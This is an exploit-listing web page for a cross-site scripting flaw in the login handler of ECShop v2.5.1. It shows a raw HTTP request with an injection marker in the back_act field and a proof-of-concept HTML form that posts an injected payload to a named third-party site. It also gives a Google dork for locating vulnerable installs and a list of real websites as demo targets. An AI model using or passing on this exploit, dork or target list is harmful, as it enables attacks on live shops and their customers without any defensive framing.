facebook facebook twitter rss

ECShop v2.5.1 Cross site scripting

Author: JoKeR_StEx , Published: 26-02-2014
#####################################################
# Exploit Title : ECShop v2.5.1 Cross site scripting
# Author : JoKeR_StEx
# Date : 24/02/2014
# Vendor Homepage : http://www.ecshop.com/
#####################################################

Host: www.t4u.com.tw
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.t4u.com.tw/shop/user.php
Cookie: ECS_ID=293af685d8c86d05f305ce26dfa58bb600693873; ECS[visit_times]=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
==============================================================================
username=user&password=user&act=act_login&back_act=[XSS]

[+] P.O.C :

<html>
<form action="http://www.newflavor.fr/user.php" method="POST">
<input type="hidden" name="back_act" value='"><center><h1>JoKeR_StEx</h1></center>'>
<input type="submit" name="xss" value="xss">
</form>
</html>
<!--
# Google Dork : intext:"powered by ECShop v2.5.1"
[+] Demo :
http://www.t4u.com.tw/shop/user.php
http://www.zhonghuarui.com.cn/en/user.php
http://www.piacejewellery.com/user.php
-->

Like us on Facebook :